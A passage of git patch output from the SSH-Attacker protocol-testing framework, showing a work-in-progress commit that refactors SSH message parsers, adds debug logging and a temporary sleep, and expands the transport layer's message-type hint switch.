adjustContext(KeyExchangeInitMessage message) { sshContext.getExchangeHashInputHolder().setServerKeyExchangeInit(message); } else { + LOGGER.info("Client_Coookie is: {}", message.getCookie()); + sshContext.setClientCookie(message.getCookie().getValue()); sshContext.setClientSupportedKeyExchangeAlgorithms( Converter.nameListToEnumValues( diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/HybridKeyExchangeInitMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/HybridKeyExchangeInitMessageParser.java index 68e186b20..f4abaa28a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/HybridKeyExchangeInitMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/HybridKeyExchangeInitMessageParser.java @@ -130,6 +130,6 @@ protected HybridKeyExchangeInitMessage createMessage() { */ @Override public void parse(HybridKeyExchangeInitMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/KeyExchangeInitMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/KeyExchangeInitMessageParser.java index 77ee4afe0..c738780f8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/KeyExchangeInitMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/KeyExchangeInitMessageParser.java @@ -231,6 +231,6 @@ public void parseMessageSpecificContents(KeyExchangeInitMessage message) { @Override public void parse(KeyExchangeInitMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/NewKeysMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/NewKeysMessageParser.java index 1f3e4dd6d..3e8894acb 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/NewKeysMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/NewKeysMessageParser.java @@ -36,11 +36,11 @@ public NewKeysMessage createMessage() { @Override protected void parseMessageSpecificContents(NewKeysMessage message) { // does nothing, only used to take the one byte out of the stream - parseByteString(1); + // parseByteString(1); } @Override public void parse(NewKeysMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ServiceAcceptMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ServiceAcceptMessageParser.java index ac8932d96..5adc33dc2 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ServiceAcceptMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ServiceAcceptMessageParser.java @@ -56,6 +56,6 @@ public ServiceAcceptMessage createMessage() { @Override public void parse(ServiceAcceptMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ServiceRequestMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ServiceRequestMessageParser.java index fc3950e14..1f02a0fa4 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ServiceRequestMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ServiceRequestMessageParser.java @@ -55,6 +55,6 @@ protected void parseMessageSpecificContents(ServiceRequestMessage message) { @Override public void parse(ServiceRequestMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/KeyExchangeInitMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/KeyExchangeInitMessagePreparator.java index 22df0615b..83cf93952 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/KeyExchangeInitMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/preparator/KeyExchangeInitMessagePreparator.java @@ -61,10 +61,10 @@ public void prepareMessageSpecificContents() { chooser.getClientFirstKeyExchangePacketFollows()); getObject().setReserved(chooser.getClientReserved()); - chooser.getContext() - .getSshContext() - .getExchangeHashInputHolder() - .setClientKeyExchangeInit(getObject()); + /*chooser.getContext() + .getSshContext() + .getExchangeHashInputHolder() + .setClientKeyExchangeInit(getObject());*/ } else { getObject().setCookie(chooser.getServerCookie()); getObject() @@ -106,10 +106,10 @@ public void prepareMessageSpecificContents() { chooser.getServerFirstKeyExchangePacketFollows()); getObject().setReserved(chooser.getServerReserved()); - chooser.getContext() - .getSshContext() - .getExchangeHashInputHolder() - .setServerKeyExchangeInit(getObject()); + /*chooser.getContext() + .getSshContext() + .getExchangeHashInputHolder() + .setServerKeyExchangeInit(getObject());*/ } } } From bf1e58a50c270a6d02aa764bb92c40536d7b4dbc Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sat, 8 Jul 2023 00:37:35 +0200 Subject: [PATCH 028/176] wip: technically working, fixed some known issues for the transport-protocols. Client is working roughly, the packets are corret but the streaming makes problems because of timeouts / missing retries --- .../core/layer/impl/SSH2Layer.java | 4 + .../sshattacker/core/layer/impl/TcpLayer.java | 8 + .../core/layer/impl/TransportLayer.java | 177 ++++++++++++++++++ .../core/packet/parser/BlobPacketParser.java | 5 + .../transport/parser/DebugMessageParser.java | 2 +- .../DhGexKeyExchangeGroupMessageParser.java | 2 +- .../DhGexKeyExchangeInitMessageParser.java | 2 +- ...GexKeyExchangeOldRequestMessageParser.java | 2 +- .../DhGexKeyExchangeReplyMessageParser.java | 2 +- .../DhGexKeyExchangeRequestMessageParser.java | 2 +- .../DhKeyExchangeInitMessageParser.java | 2 +- .../DhKeyExchangeReplyMessageParser.java | 2 +- .../parser/DisconnectMessageParser.java | 2 +- .../EcdhKeyExchangeInitMessageParser.java | 2 +- .../EcdhKeyExchangeReplyMessageParser.java | 2 +- .../HybridKeyExchangeReplyMessageParser.java | 2 +- .../transport/parser/IgnoreMessageParser.java | 2 +- .../RsaKeyExchangeDoneMessageParser.java | 2 +- .../RsaKeyExchangePubkeyMessageParser.java | 2 +- .../RsaKeyExchangeSecretMessageParser.java | 2 +- .../parser/UnimplementedMessageParser.java | 2 +- .../parser/UnknownMessageParser.java | 2 +- .../serializer/DebugMessageSerializer.java | 2 +- ...hGexKeyExchangeGroupMessageSerializer.java | 2 +- ...DhGexKeyExchangeInitMessageSerializer.java | 2 +- ...eyExchangeOldRequestMessageSerializer.java | 2 +- ...hGexKeyExchangeReplyMessageSerializer.java | 2 +- ...exKeyExchangeRequestMessageSerializer.java | 2 +- .../DhKeyExchangeInitMessageSerializer.java | 2 +- .../DhKeyExchangeReplyMessageSerializer.java | 2 +- .../DisconnectMessageSerializer.java | 2 +- .../EcdhKeyExchangeInitMessageSerializer.java | 2 +- ...EcdhKeyExchangeReplyMessageSerializer.java | 2 +- ...ybridKeyExchangeInitMessageSerializer.java | 2 +- .../serializer/IgnoreMessageSerializer.java | 2 +- .../RsaKeyExchangeDoneMessageSerializer.java | 2 +- ...RsaKeyExchangePubkeyMessageSerializer.java | 2 +- ...RsaKeyExchangeSecretMessageSerializer.java | 2 +- .../ServiceRequestMessageSerializer.java | 2 +- .../UnimplementedMessageSerializer.java | 2 +- .../serializer/UnknownMessageSerializer.java | 2 +- 41 files changed, 231 insertions(+), 37 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index cd2826391..7a3d905f8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -404,6 +404,10 @@ public void readMessageForHint(PacketLayerHint hint) { case SSH_MSG_SERVICE_REQUEST: readServiceRequestData(); break; + case SSH_MSG_HBR_REPLY: + readServiceRequestData(); + break; + default: LOGGER.error("Undefined record layer type, found type {}", hint.getType()); break; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java index 7bca3f2dc..7a79eda58 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java @@ -18,8 +18,10 @@ import de.rub.nds.sshattacker.core.layer.stream.HintedInputStreamAdapterStream; import de.rub.nds.tlsattacker.transport.tcp.TcpTransportHandler; import java.io.IOException; +import java.util.concurrent.TimeUnit; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; +import org.glassfish.jaxb.core.v2.TODO; /** * The TCP layer is a wrapper around an underlying TCP socket. It forwards the sockets InputStream @@ -67,6 +69,12 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException public HintedInputStream getDataStream() { getTransportHandler().setTimeout(getTransportHandler().getTimeout()); LOGGER.debug("[bro] TCP-Layer is transmitting Datastream now"); + // TODO: remove later, just for debugging + try { + TimeUnit.SECONDS.sleep(1); + } catch (InterruptedException e) { + throw new RuntimeException(e); + } currentInputStream = new HintedInputStreamAdapterStream(null, getTransportHandler().getInputStream()); return currentInputStream; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java index a941c5d0a..64d6dcdcf 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java @@ -326,6 +326,7 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException LOGGER.debug("[bro] receiveMoreDataForHint now in Transport"); LayerProcessingHint desiredHint = hint; InputStream dataStream = getLowerLayer().getDataStream(); + LOGGER.debug("Avialble Data: {}", dataStream.available()); AbstractPacketParser parser; AbstractPacket packet; @@ -465,9 +466,185 @@ public PacketLayerHint temp_parser(AbstractPacket packet, SshContext context) { case SSH_MSG_SERVICE_REQUEST: LOGGER.debug("[bro] returning SSH_MSG_SERVICE_REQUEST Hint"); return new PacketLayerHint(ProtocolMessageType.SSH_MSG_SERVICE_REQUEST); + case SSH_MSG_HBR_REPLY: + LOGGER.debug("[bro] returning SSH_MSG_SERVICE_REQUEST Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_HBR_REPLY); /* case SSH_MSG_NEWKEYS: LOGGER.debug("[bro] returning SSH_MSG_NEWKEYS Hint"); return new PacketLayerHint(ProtocolMessageType.SSH_MSG_NEWKEYS);*/ + //SPACER// + case SSH_MSG_DISCONNECT: + LOGGER.debug("[bro] returning SSH_MSG_DISCONNECT Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_DISCONNECT); + case SSH_MSG_IGNORE: + LOGGER.debug("[bro] returning SSH_MSG_IGNORE Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_IGNORE); + case SSH_MSG_UNIMPLEMENTED: + LOGGER.debug("[bro] returning SSH_MSG_UNIMPLEMENTED Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_UNIMPLEMENTED); + case SSH_MSG_DEBUG: + LOGGER.debug("[bro] returning SSH_MSG_DEBUG Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_DEBUG); + case SSH_MSG_SERVICE_ACCEPT: + LOGGER.debug("[bro] returning SSH_MSG_SERVICE_ACCEPT Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_SERVICE_ACCEPT); + case SSH_MSG_EXT_INFO: + LOGGER.debug("[bro] returning SSH_MSG_EXT_INFO Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_EXT_INFO); + case SSH_MSG_NEWCOMPRESS: + LOGGER.debug("[bro] returning SSH_MSG_NEWCOMPRESS Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_NEWCOMPRESS); + case SSH_MSG_KEX_DH_GEX_REQUEST_OLD: + LOGGER.debug("[bro] returning SSH_MSG_KEX_DH_GEX_REQUEST_OLD Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEX_DH_GEX_REQUEST_OLD); + case SSH_MSG_KEX_DH_GEX_REQUEST: + LOGGER.debug("[bro] returning SSH_MSG_KEX_DH_GEX_REQUEST Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEX_DH_GEX_REQUEST); + case SSH_MSG_KEX_DH_GEX_GROUP: + LOGGER.debug("[bro] returning SSH_MSG_KEX_DH_GEX_GROUP Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEX_DH_GEX_GROUP); + case SSH_MSG_KEX_DH_GEX_INIT: + LOGGER.debug("[bro] returning SSH_MSG_KEX_DH_GEX_INIT Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEX_DH_GEX_INIT); + case SSH_MSG_KEX_DH_GEX_REPLY: + LOGGER.debug("[bro] returning SSH_MSG_KEX_DH_GEX_REPLY Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEX_DH_GEX_REPLY); + case SSH_MSG_KEXDH_INIT: + LOGGER.debug("[bro] returning SSH_MSG_KEXDH_INIT Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXDH_INIT); + case SSH_MSG_KEXDH_REPLY: + LOGGER.debug("[bro] returning SSH_MSG_KEXDH_REPLY Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXDH_REPLY); + case SSH_MSG_KEX_ECDH_INIT: + LOGGER.debug("[bro] returning SSH_MSG_KEX_ECDH_INIT Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEX_ECDH_INIT); + case SSH_MSG_KEX_ECDH_REPLY: + LOGGER.debug("[bro] returning SSH_MSG_KEX_ECDH_REPLY Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEX_ECDH_REPLY); + case SSH_MSG_ECMQV_INIT: + LOGGER.debug("[bro] returning SSH_MSG_ECMQV_INIT Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_ECMQV_INIT); + case SSH_MSG_ECMQV_REPLY: + LOGGER.debug("[bro] returning SSH_MSG_ECMQV_REPLY Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_ECMQV_REPLY); + case SSH_MSG_KEXRSA_PUBKEY: + LOGGER.debug("[bro] returning SSH_MSG_KEXRSA_PUBKEY Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXRSA_PUBKEY); + case SSH_MSG_KEXRSA_SECRET: + LOGGER.debug("[bro] returning SSH_MSG_KEXRSA_SECRET Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXRSA_SECRET); + case SSH_MSG_KEXRSA_DONE: + LOGGER.debug("[bro] returning SSH_MSG_KEXRSA_DONE Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXRSA_DONE); + case SSH_MSG_KEXGSS_INIT: + LOGGER.debug("[bro] returning SSH_MSG_KEXGSS_INIT Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXGSS_INIT); + case SSH_MSG_KEXGSS_CONTINUE: + LOGGER.debug("[bro] returning SSH_MSG_KEXGSS_CONTINUE Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXGSS_CONTINUE); + case SSH_MSG_KEXGSS_COMPLETE: + LOGGER.debug("[bro] returning SSH_MSG_KEXGSS_COMPLETE Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXGSS_COMPLETE); + case SSH_MSG_KEXGSS_HOSTKEY: + LOGGER.debug("[bro] returning SSH_MSG_KEXGSS_HOSTKEY Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXGSS_HOSTKEY); + case SSH_MSG_KEXGSS_ERROR: + LOGGER.debug("[bro] returning SSH_MSG_KEXGSS_ERROR Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXGSS_ERROR); + case SSH_MSG_KEXGSS_GROUPREQ: + LOGGER.debug("[bro] returning SSH_MSG_KEXGSS_GROUPREQ Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXGSS_GROUPREQ); + case SSH_MSG_KEXGSS_GROUP: + LOGGER.debug("[bro] returning SSH_MSG_KEXGSS_GROUP Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_KEXGSS_GROUP); + case SSH_MSG_USERAUTH_REQUEST: + LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_REQUEST Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_REQUEST); + case SSH_MSG_USERAUTH_FAILURE: + LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_FAILURE Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_FAILURE); + case SSH_MSG_USERAUTH_SUCCESS: + LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_SUCCESS Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_SUCCESS); + case SSH_MSG_USERAUTH_BANNER: + LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_BANNER Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_BANNER); + case SSH_MSG_USERAUTH_PK_OK: + LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_PK_OK Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_PK_OK); + case SSH_MSG_USERAUTH_PASSWD_CHANGEREQ: + LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_PASSWD_CHANGEREQ Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_PASSWD_CHANGEREQ); + case SSH_MSG_USERAUTH_INFO_REQUEST: + LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_INFO_REQUEST Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_INFO_REQUEST); + case SSH_MSG_USERAUTH_INFO_RESPONSE: + LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_INFO_RESPONSE Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_INFO_RESPONSE); + case SSH_MSG_USERAUTH_GSSAPI_RESPONSE: + LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_GSSAPI_RESPONSE Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_GSSAPI_RESPONSE); + case SSH_MSG_USERAUTH_GSSAPI_TOKEN: + LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_GSSAPI_TOKEN Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_GSSAPI_TOKEN); + case SSH_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE: + LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE); + case SSH_MSG_USERAUTH_GSSAPI_ERROR: + LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_GSSAPI_ERROR Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_GSSAPI_ERROR); + case SSH_MSG_USERAUTH_GSSAPI_ERRTOK: + LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_GSSAPI_ERRTOK Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_GSSAPI_ERRTOK); + case SSH_MSG_USERAUTH_GSSAPI_MIC: + LOGGER.debug("[bro] returning SSH_MSG_USERAUTH_GSSAPI_MIC Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_USERAUTH_GSSAPI_MIC); + case SSH_MSG_GLOBAL_REQUEST: + LOGGER.debug("[bro] returning SSH_MSG_GLOBAL_REQUEST Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_GLOBAL_REQUEST); + case SSH_MSG_REQUEST_SUCCESS: + LOGGER.debug("[bro] returning SSH_MSG_REQUEST_SUCCESS Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_REQUEST_SUCCESS); + case SSH_MSG_REQUEST_FAILURE: + LOGGER.debug("[bro] returning SSH_MSG_REQUEST_FAILURE Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_REQUEST_FAILURE); + case SSH_MSG_CHANNEL_OPEN: + LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_OPEN Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_OPEN); + case SSH_MSG_CHANNEL_OPEN_CONFIRMATION: + LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_OPEN_CONFIRMATION Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_OPEN_CONFIRMATION); + case SSH_MSG_CHANNEL_OPEN_FAILURE: + LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_OPEN_FAILURE Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_OPEN_FAILURE); + case SSH_MSG_CHANNEL_WINDOW_ADJUST: + LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_WINDOW_ADJUST Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_WINDOW_ADJUST); + case SSH_MSG_CHANNEL_DATA: + LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_DATA Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_DATA); + case SSH_MSG_CHANNEL_EXTENDED_DATA: + LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_EXTENDED_DATA Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_EXTENDED_DATA); + case SSH_MSG_CHANNEL_EOF: + LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_EOF Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_EOF); + case SSH_MSG_CHANNEL_CLOSE: + LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_CLOSE Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_CLOSE); + case SSH_MSG_CHANNEL_REQUEST: + LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_REQUEST Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_REQUEST); + case SSH_MSG_CHANNEL_SUCCESS: + LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_SUCCESS Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_SUCCESS); + case SSH_MSG_CHANNEL_FAILURE: + LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_FAILURE Hint"); + return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_FAILURE); + case UNKNOWN: + LOGGER.debug("[bro] returning UNKNOWN Hint"); + return new PacketLayerHint(ProtocolMessageType.UNKNOWN); + default: LOGGER.debug( "[bro] cannot identifie {} as {} - returningn null", diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BlobPacketParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BlobPacketParser.java index 857d09567..e84b8998a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BlobPacketParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BlobPacketParser.java @@ -31,6 +31,11 @@ public void parse(BlobPacket blobPacket) { // BlobPacket packet = new BlobPacket(); blobPacket.setCiphertext(parseByteArrayField(getBytesLeft())); + + LOGGER.debug( + "Ciphertext bytes: {}", + ArrayConverter.bytesToHexString(blobPacket.getCiphertext().getValue())); + blobPacket.setCompletePacketBytes(getAlreadyParsed()); LOGGER.debug( diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DebugMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DebugMessageParser.java index a6aa9a3f5..dcf12d961 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DebugMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DebugMessageParser.java @@ -37,7 +37,7 @@ public DebugMessageParser(InputStream stream) { @Override public void parse(DebugMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } // @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeGroupMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeGroupMessageParser.java index f17399cb2..9d20589a9 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeGroupMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeGroupMessageParser.java @@ -65,6 +65,6 @@ protected void parseMessageSpecificContents(DhGexKeyExchangeGroupMessage message @Override public void parse(DhGexKeyExchangeGroupMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeInitMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeInitMessageParser.java index e4b17d031..228cb69bd 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeInitMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeInitMessageParser.java @@ -54,6 +54,6 @@ protected void parseMessageSpecificContents(DhGexKeyExchangeInitMessage message) @Override public void parse(DhGexKeyExchangeInitMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeOldRequestMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeOldRequestMessageParser.java index 41fc83443..2cd8ac758 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeOldRequestMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeOldRequestMessageParser.java @@ -49,6 +49,6 @@ protected void parseMessageSpecificContents(DhGexKeyExchangeOldRequestMessage me @Override public void parse(DhGexKeyExchangeOldRequestMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeReplyMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeReplyMessageParser.java index 558c34fb6..b33b9d27f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeReplyMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeReplyMessageParser.java @@ -34,7 +34,7 @@ public DhGexKeyExchangeReplyMessageParser(InputStream stream) { @Override public void parse(DhGexKeyExchangeReplyMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } /* @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeRequestMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeRequestMessageParser.java index b470c7cf5..aa6e2e653 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeRequestMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeRequestMessageParser.java @@ -61,6 +61,6 @@ protected void parseMessageSpecificContents(DhGexKeyExchangeRequestMessage messa @Override public void parse(DhGexKeyExchangeRequestMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhKeyExchangeInitMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhKeyExchangeInitMessageParser.java index c7d3ea92c..5bdc3e2e6 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhKeyExchangeInitMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhKeyExchangeInitMessageParser.java @@ -53,6 +53,6 @@ protected void parseMessageSpecificContents(DhKeyExchangeInitMessage message) { @Override public void parse(DhKeyExchangeInitMessage message) { - parseMessageSpecificContents(message); + parseProtocolMessageContents(message); } } diff --git 